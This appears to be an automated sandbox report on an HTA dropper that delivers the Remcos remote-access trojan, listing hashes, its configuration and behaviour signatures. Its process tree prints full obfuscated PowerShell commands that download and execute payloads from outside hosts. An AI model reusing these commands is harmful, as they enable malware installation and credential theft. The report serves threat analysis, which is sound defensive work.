Analysis
-
max time kernel
149s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
26-11-2024 08:16
Static task
static1
Behavioral task
behavioral1
Sample
thinkingbestthingswhichcomingetniretimegivenmegood.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
thinkingbestthingswhichcomingetniretimegivenmegood.hta
Resource
win10v2004-20241007-en
General
-
Target
thinkingbestthingswhichcomingetniretimegivenmegood.hta
-
Size
600KB
-
MD5
c24178318fab715f3b613fc11396ed80
-
SHA1
d6711bb536adde5cb961f7d1559fc287f4aa3d76
-
SHA256
70576f474296d70ab1182339945255eeed65d7f5e8b71b153a56b9e2c0478ec5
-
SHA512
f397726076afe79c0f2e00afd8ddd7bc90e47cdffd04a033552e9246039cf781bf08c1a1bfb49c056d853106f82d6d00826f7b4cf9752bba032def61bb0e7d71
-
SSDEEP
192:4dE6COljVxi5Dq4bm4i5Dq4gmXPi5Dq4oi5Dq4Umji5Dq4Jzt4kQ:b6COljV/zO7
Malware Config
Extracted
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c
Extracted
remcos
RemoteHost
balalalala.duckdns.org:6946
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-316C3Y
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/3736-123-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/3116-124-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/4868-130-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/3116-124-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/3736-123-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 3 IoCs
flow pid Process 14 1668 POWErsHElL.Exe 17 3596 powershell.exe 24 3596 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 5088 powershell.exe 3596 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 1668 POWErsHElL.Exe 3428 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts CasPol.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3596 set thread context of 4796 3596 powershell.exe 105 PID 4796 set thread context of 3736 4796 CasPol.exe 108 PID 4796 set thread context of 3116 4796 CasPol.exe 111 PID 4796 set thread context of 4868 4796 CasPol.exe 115 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language POWErsHElL.Exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings POWErsHElL.Exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 1668 POWErsHElL.Exe 1668 POWErsHElL.Exe 3428 powershell.exe 3428 powershell.exe 5088 powershell.exe 5088 powershell.exe 3596 powershell.exe 3596 powershell.exe 3596 powershell.exe 3596 powershell.exe 3736 CasPol.exe 3736 CasPol.exe 4868 CasPol.exe 4868 CasPol.exe 3736 CasPol.exe 3736 CasPol.exe -
Suspicious behavior: MapViewOfSection 9 IoCs
pid Process 4796 CasPol.exe 4796 CasPol.exe 4796 CasPol.exe 4796 CasPol.exe 4796 CasPol.exe 4796 CasPol.exe 4796 CasPol.exe 4796 CasPol.exe 4796 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1668 POWErsHElL.Exe Token: SeDebugPrivilege 3428 powershell.exe Token: SeDebugPrivilege 5088 powershell.exe Token: SeDebugPrivilege 3596 powershell.exe Token: SeDebugPrivilege 4868 CasPol.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4796 CasPol.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1684 wrote to memory of 1668 1684 mshta.exe 83 PID 1684 wrote to memory of 1668 1684 mshta.exe 83 PID 1684 wrote to memory of 1668 1684 mshta.exe 83 PID 1668 wrote to memory of 3428 1668 POWErsHElL.Exe 85 PID 1668 wrote to memory of 3428 1668 POWErsHElL.Exe 85 PID 1668 wrote to memory of 3428 1668 POWErsHElL.Exe 85 PID 1668 wrote to memory of 936 1668 POWErsHElL.Exe 88 PID 1668 wrote to memory of 936 1668 POWErsHElL.Exe 88 PID 1668 wrote to memory of 936 1668 POWErsHElL.Exe 88 PID 936 wrote to memory of 4352 936 csc.exe 89 PID 936 wrote to memory of 4352 936 csc.exe 89 PID 936 wrote to memory of 4352 936 csc.exe 89 PID 1668 wrote to memory of 2980 1668 POWErsHElL.Exe 96 PID 1668 wrote to memory of 2980 1668 POWErsHElL.Exe 96 PID 1668 wrote to memory of 2980 1668 POWErsHElL.Exe 96 PID 2980 wrote to memory of 5088 2980 WScript.exe 97 PID 2980 wrote to memory of 5088 2980 WScript.exe 97 PID 2980 wrote to memory of 5088 2980 WScript.exe 97 PID 5088 wrote to memory of 3596 5088 powershell.exe 99 PID 5088 wrote to memory of 3596 5088 powershell.exe 99 PID 5088 wrote to memory of 3596 5088 powershell.exe 99 PID 3596 wrote to memory of 1324 3596 powershell.exe 104 PID 3596 wrote to memory of 1324 3596 powershell.exe 104 PID 3596 wrote to memory of 1324 3596 powershell.exe 104 PID 3596 wrote to memory of 4796 3596 powershell.exe 105 PID 3596 wrote to memory of 4796 3596 powershell.exe 105 PID 3596 wrote to memory of 4796 3596 powershell.exe 105 PID 3596 wrote to memory of 4796 3596 powershell.exe 105 PID 3596 wrote to memory of 4796 3596 powershell.exe 105 PID 3596 wrote to memory of 4796 3596 powershell.exe 105 PID 3596 wrote to memory of 4796 3596 powershell.exe 105 PID 3596 wrote to memory of 4796 3596 powershell.exe 105 PID 3596 wrote to memory of 4796 3596 powershell.exe 105 PID 3596 wrote to memory of 4796 3596 powershell.exe 105 PID 4796 wrote to memory of 1632 4796 CasPol.exe 107 PID 4796 wrote to memory of 1632 4796 CasPol.exe 107 PID 4796 wrote to memory of 1632 4796 CasPol.exe 107 PID 4796 wrote to memory of 3736 4796 CasPol.exe 108 PID 4796 wrote to memory of 3736 4796 CasPol.exe 108 PID 4796 wrote to memory of 3736 4796 CasPol.exe 108 PID 4796 wrote to memory of 3736 4796 CasPol.exe 108 PID 4796 wrote to memory of 4508 4796 CasPol.exe 109 PID 4796 wrote to memory of 4508 4796 CasPol.exe 109 PID 4796 wrote to memory of 4508 4796 CasPol.exe 109 PID 4796 wrote to memory of 4432 4796 CasPol.exe 110 PID 4796 wrote to memory of 4432 4796 CasPol.exe 110 PID 4796 wrote to memory of 4432 4796 CasPol.exe 110 PID 4796 wrote to memory of 3116 4796 CasPol.exe 111 PID 4796 wrote to memory of 3116 4796 CasPol.exe 111 PID 4796 wrote to memory of 3116 4796 CasPol.exe 111 PID 4796 wrote to memory of 3116 4796 CasPol.exe 111 PID 4796 wrote to memory of 4168 4796 CasPol.exe 112 PID 4796 wrote to memory of 4168 4796 CasPol.exe 112 PID 4796 wrote to memory of 4168 4796 CasPol.exe 112 PID 4796 wrote to memory of 1400 4796 CasPol.exe 113 PID 4796 wrote to memory of 1400 4796 CasPol.exe 113 PID 4796 wrote to memory of 1400 4796 CasPol.exe 113 PID 4796 wrote to memory of 2448 4796 CasPol.exe 114 PID 4796 wrote to memory of 2448 4796 CasPol.exe 114 PID 4796 wrote to memory of 2448 4796 CasPol.exe 114 PID 4796 wrote to memory of 4868 4796 CasPol.exe 115 PID 4796 wrote to memory of 4868 4796 CasPol.exe 115 PID 4796 wrote to memory of 4868 4796 CasPol.exe 115 PID 4796 wrote to memory of 4868 4796 CasPol.exe 115
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\thinkingbestthingswhichcomingetniretimegivenmegood.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\SysWOW64\wINdOwSpoweRshelL\v1.0\POWErsHElL.Exe"C:\Windows\sYStEM32\wINdOwSpoweRshelL\v1.0\POWErsHElL.Exe" "poWeRSHell.exE -EX BYpASS -nOp -W 1 -C dEViceCRedeNtIaLDEpLoymenT ; Iex($(iex('[sySTem.TExt.enCoDINg]'+[cHAR]58+[CHar]0x3a+'utf8.GetSTrING([SYsTem.CoNVERT]'+[chaR]0X3a+[cHar]0x3a+'FromBASE64StRINg('+[char]34+'JE5yakxDICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbWJFUmRlZmluaXRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpveSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVck5XY2FHYVpQLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENvR3FKbU9hdix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU0JSVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS0JFbEZIZXQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ4S09Ld2IiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVYVUZJUUF2eCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTnJqTEM6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE5Mi8xMjIvd2VjcmVhdGVkYmV0dGVydGhpbmdzZ29vZHdheWVudGlyZWxpZmVncmVhdHRvZ29iZXR0ZXJ0aGluZ3MudElGIiwiJEVudjpBUFBEQVRBXHdlY3JlYXRlZGJldHRlcnRoaW5nc2dvb2R3YXllbnRpcmVsaWZlZ3JlYXR0b2dvYmV0dGVydGhpLnZCcyIsMCwwKTtTdEFSdC1TTGVlcCgzKTtJSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcd2VjcmVhdGVkYmV0dGVydGhpbmdzZ29vZHdheWVudGlyZWxpZmVncmVhdHRvZ29iZXR0ZXJ0aGkudkJzIg=='+[cHar]34+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpASS -nOp -W 1 -C dEViceCRedeNtIaLDEpLoymenT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3428
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sjqcpvla\sjqcpvla.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES92E9.tmp" "c:\Users\Admin\AppData\Local\Temp\sjqcpvla\CSC205EED8876BD43E59BDEC45465D517C9.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:4352
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\wecreatedbetterthingsgoodwayentirelifegreattogobetterthi.vBs"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoIChbc1RySU5nXSR2RXJCb3NFcHJFRkVSZW5jZSlbMSwzXSsnWCctam9pbicnKSgoKCdzOTBKaW1hJysnZ2VVcmwgPSBJZkpvaHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGknKycvZmlsZS9nZXQnKyc/ZmlsZWtleT1zaFRQSGJDUFg4by1sT3RDcUhMRzZfMHhDeS14bDR0bnhsQVZiUTk1LWQnKyd2aVRLNWNBUmFOZCcrJ1FqYmIzbWV4ZndReksnKydtVFhnJnNraXByZWc9dHJ1ZSZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI1MzEzMDliNWZmN2MgSWYnKydKbztzOTBKd2ViQ2xpZW50ID0nKycgTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtzOTBKaW1hZ2VCeXRlcyA9IHM5MEp3ZWJDbGllbnQuRG93bmxvYWREYXRhKHM5MEppbWFnZVVybCk7czkwSmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHM5MEppbWFnZUJ5dGVzKTtzOTBKc3RhcnRGbGFnID0gSWZKbzw8QkFTRTY0X1NUQVJUPj5JZkpvO3M5MEplbmRGbGFnID0gSWZKbzw8QkFTRTY0X0VORD4+SWZKbztzOTBKc3RhcnRJbmRleCA9IHM5MEppbWFnZVRleHQuSW5kZXhPZihzOTBKc3RhcnRGbGFnKTtzOTBKZW5kSW5kZXggPSBzOTBKaW1hZ2VUZXh0LkluZGV4T2YoczkwSmVuZEZsYWcpO3M5MEpzdGFydEluZGUnKyd4IC1nZSAwIC1hbmQgczkwSmVuZEluZGV4IC1ndCBzOTBKc3RhcnRJbmRleDtzOTBKc3RhcnRJbmRleCArPSBzOTBKc3RhcnRGbGFnLkxlbmd0aDtzOTBKYmFzZTY0TGVuZ3RoID0gczkwSmVuZEluZGV4IC0gczkwSnN0YXJ0SW5kZXg7czkwSmJhc2U2NENvbW1hbicrJ2QgPSBzOTBKaW1hZ2VUZXh0LlN1JysnYnN0cmluZyhzOTBKc3RhcnRJbmRleCwgczkwSmJhc2U2NExlbmd0aCk7czkwJysnSmJhc2U2NFJldmVyc2VkID0gLWpvaW4gKHM5MEpiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5JysnKCkgdzRFIEZvckVhY2gtT2JqZWN0IHsgczkwSl8gfSlbLTEuLi0oczkwSmJhc2U2NENvbW1hbmQuTCcrJ2VuZ3RoKV07czkwSmNvbW1hbmRCJysneXRlcyA9IFtTeXN0ZScrJ20uQ29udmVydF0nKyc6OkZyb21CYXNlNjRTdHJpbmcoczkwSmJhc2U2NFJldmVyc2VkKTtzOTBKbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHM5MEpjb21tYW5kQnl0ZXMpO3M5MEp2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKElmSm9WQUlJZkpvKScrJztzOTBKdmFpTWV0aG9kLkludm9rZShzOScrJzBKbnVsbCwgQChJZkpvdHh0LlJGVlJFLzIyMS8yOTEuODcxLjY0Ljg5MS8vOnB0dGhJZkpvLCBJZkpvZGVzYXRpdmFkb0lmSm8sIElmSm9kZXNhdGl2YWRvSWZKbywgSWZKJysnb2Rlc2F0aXZhZG9JZkpvJysnLCBJZkpvQ2FzUG9sSWZKJysnbywgSWZKb2Rlc2F0aXZhZG9JZkpvLCBJJysnZkpvZGVzYXRpdmFkb0lmSm8sSWZKb2Rlc2F0aXZhZG9JZkpvLElmSm9kZXNhdGl2YWRvSWZKJysnbyxJZkpvZGVzYXRpdmFkb0lmSm8sSWZKb2Rlc2F0aXZhZG9JZkpvLElmSm9kZXNhdCcrJ2l2YWRvSScrJ2ZKbyxJZkpvMUlmJysnSm8sSWZKb2Rlc2F0aXZhZG9JZkpvKSk7JykgIC1DcmVQTGFjRSAnSWZKbycsW0NIYVJdMzktUmVQbEFDZSAnczkwSicsW0NIYVJdMzYtQ3JlUExhY0UgIChbQ0hhUl0xMTkrW0NIYVJdNTIrW0NIYVJdNjkpLFtDSGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( ([sTrINg]$vErBosEprEFERence)[1,3]+'X'-join'')((('s90Jima'+'geUrl = IfJohttps://3105.filemail.com/api'+'/file/get'+'?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-d'+'viTK5cARaNd'+'Qjbb3mexfwQzK'+'mTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c If'+'Jo;s90JwebClient ='+' New-Object System.Net.W'+'ebClient;s90JimageBytes = s90JwebClient.DownloadData(s90JimageUrl);s90JimageText = [System.Text.Encoding]::UTF8.GetString(s90JimageBytes);s90JstartFlag = IfJo<<BASE64_START>>IfJo;s90JendFlag = IfJo<<BASE64_END>>IfJo;s90JstartIndex = s90JimageText.IndexOf(s90JstartFlag);s90JendIndex = s90JimageText.IndexOf(s90JendFlag);s90JstartInde'+'x -ge 0 -and s90JendIndex -gt s90JstartIndex;s90JstartIndex += s90JstartFlag.Length;s90Jbase64Length = s90JendIndex - s90JstartIndex;s90Jbase64Comman'+'d = s90JimageText.Su'+'bstring(s90JstartIndex, s90Jbase64Length);s90'+'Jbase64Reversed = -join (s90Jbase64Command.ToCharArray'+'() w4E ForEach-Object { s90J_ })[-1..-(s90Jbase64Command.L'+'ength)];s90JcommandB'+'ytes = [Syste'+'m.Convert]'+'::FromBase64String(s90Jbase64Reversed);s90JloadedAssembly = [System.Reflection.Assembly]::Load(s90JcommandBytes);s90JvaiMethod = [dnlib.IO.Home].GetMethod(IfJoVAIIfJo)'+';s90JvaiMethod.Invoke(s9'+'0Jnull, @(IfJotxt.RFVRE/221/291.871.64.891//:ptthIfJo, IfJodesativadoIfJo, IfJodesativadoIfJo, IfJ'+'odesativadoIfJo'+', IfJoCasPolIfJ'+'o, IfJodesativadoIfJo, I'+'fJodesativadoIfJo,IfJodesativadoIfJo,IfJodesativadoIfJ'+'o,IfJodesativadoIfJo,IfJodesativadoIfJo,IfJodesat'+'ivadoI'+'fJo,IfJo1If'+'Jo,IfJodesativadoIfJo));') -CrePLacE 'IfJo',[CHaR]39-RePlACe 's90J',[CHaR]36-CrePLacE ([CHaR]119+[CHaR]52+[CHaR]69),[CHaR]124))"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵PID:1324
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\huyfldkofgqscjukyjozjraroutayvygal"7⤵PID:1632
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\huyfldkofgqscjukyjozjraroutayvygal"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3736
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\rwdymv"7⤵PID:4508
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\rwdymv"7⤵PID:4432
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\rwdymv"7⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:3116
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\uqrimgfjh"7⤵PID:4168
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\uqrimgfjh"7⤵PID:1400
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\uqrimgfjh"7⤵PID:2448
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\uqrimgfjh"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4868
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
102B
MD543de0a07d2b50a83fd1ef2eba49f38ea
SHA1a76cc9e5083f0aacaacfcbb0099402c4d98d47b8
SHA256855178753776081f17ff5d3135f4e71f0d30f23a6ed2fba67f019f06173e6f52
SHA512079c10bd542a2c1b4c1c81be68de40b804bae082ded216c17f12d26f70eed92267a2864a6f9f94d9e6aa91b4c5cdbf271fb6d3b632862cdce0c665a098187d1a
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
860B
MD51e24671fa0728c6138d4c8b348da42b4
SHA15a64135737a9996ac0c5395d0eb8649b239408f7
SHA256355e2a8108ff4a5a61ce8a76895d622267d0b5b33d50017ca50aa8993b617b4b
SHA512c6edc75faff28f371dac38f9e2791a46269a49c0930ec89808b3ee8cf5248dfb1333bfa6ad6c8b309be9ae20d71ba1b5da320cfe80079d41ad1a02a166553442
-
Filesize
18KB
MD5e88e08beb8fd31230f42a0ea8f22473c
SHA1ee212719c08c30fed3cd8570ba8c0d7a0002afef
SHA256f046a1ddc45e27f5002c29d707d30d050fda73212373fb249808a34632c0d8a3
SHA5129194a30f866987e938fb4f3b11c054c97f1663931fa78142a7cd6690f2e4c269346ae2f5f2e17cb4bd2f7b926cbb49025cce3d8768483175803f6f6dc4906521
-
Filesize
1KB
MD5c2f1ea513c492b173ad25bffb6ee52f0
SHA1e39359fdadbafeb4d7ed0cfd0dd9aae6c928964c
SHA256d0e7f3277570b9cd65db43856a70f2e8318fee1fe7e2df78a689dd5fa8b02e43
SHA512bc6e0ecc7c2aebdadb7e69ff29ffdfe4156a5e8def9180cd84d5661744d03c66f15ec8dd4d625fc06bf383822c5f5943ee37fdf26063c4df34b6175a3c81e6ff
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD516dfb23eaa7972c59c36fcbc0946093b
SHA11e9e3ff83a05131575f67e202d352709205f20f8
SHA25636c49c94327c8cadcad4c0d2b3a8f5162fc7bb86624923484476c5f7b960bc4c
SHA512a8b38b5e7bf886b78c5c7f01234b44647a252d4dfbcc06c99b863f8e160e3cfc151b2a83b8b49e09d13e8547419467da4bffbb8dee5fc6740032eb7c839d89dc
-
Filesize
3KB
MD5ce8fa14dbe2dc7f3d833becb61961fe2
SHA1a48f5d6a08ca64b9d5bd0e7e7e484cffc2ea6ab3
SHA25644da247cf89a6ac7429d6cfcb482361fce1302d8b790b2411f46a0aca4e07aa7
SHA512186cb44d756f1ee543ce1b1a3e3ef00d27851aeeeb90d8c9099fc5cc5c16d4afc62b71a5889ed806e05c052058f292f5a52451c80cf955c5814aef5c80e293d0
-
Filesize
162KB
MD566dea8976cdda98cc8301cb75c297156
SHA11c4404c8cc6c6c02df18ea7dc6519e7edad84c49
